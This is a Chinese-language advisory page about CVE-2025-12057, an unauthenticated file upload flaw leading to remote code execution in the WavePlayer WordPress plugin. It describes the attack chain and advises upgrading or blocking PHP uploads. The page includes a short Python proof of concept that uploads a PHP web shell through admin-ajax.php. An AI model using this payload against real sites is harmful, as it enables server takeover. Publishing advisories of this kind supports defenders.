CVE-2025-12057 CVSS 9.8 严重

CVE-2025-12057: WordPress WavePlayer插件未授权任意文件上传导致RCE

披露日期: 2025-11-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12057

漏洞类型

远程代码执行、任意文件上传、未授权访问

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WavePlayer WordPress plugin

漏洞概述

WavePlayer是WordPress平台上流行的音频播放器插件，在3.8.0之前的版本中存在严重的安全漏洞。该漏洞源于AJAX操作缺少权限验证和文件复制验证机制，允许未认证用户上传任意文件到服务器，最终实现远程代码执行(RCE)。由于攻击者无需任何认证凭证即可利用此漏洞，且CVSS评分高达9.8，该漏洞被评定为严重级别。建议所有使用该插件的用户立即升级到3.8.0或更高版本。

技术细节

漏洞存在于插件的AJAX处理逻辑中。攻击者可通过构造恶意请求，利用缺失的权限检查和文件类型验证机制，上传包含恶意代码的文件。由于插件未对上传的文件内容进行充分验证，攻击者可上传PHP脚本等可执行文件，并通过访问上传的文件路径来触发代码执行。

攻击链分析

STEP 1

攻击者识别目标WordPress站点是否使用WavePlayer插件

STEP 2

构造恶意文件上传请求，利用缺失的权限验证和文件类型检查

STEP 3

上传包含恶意代码的文件到服务器

STEP 4

通过HTTP请求访问上传的文件路径，触发代码执行

STEP 5

获得服务器远程代码执行权限，实现持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target-wordpress-site.com'
upload_url = f'{target}/wp-admin/admin-ajax.php'

payload = '<?php system($_GET["cmd"]); ?>'

files = {
    'file': ('shell.php', payload, 'application/x-php')
}

data = {
    'action': 'waveplayer_upload',
    'security': '任意值'
}

response = requests.post(upload_url, files=files, data=data)
print(response.text)

影响范围

WavePlayer WordPress plugin < 3.8.0

防御指南

临时缓解措施

如果无法立即升级，可临时禁用WavePlayer插件，或通过服务器配置阻止.php文件的上传和执行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表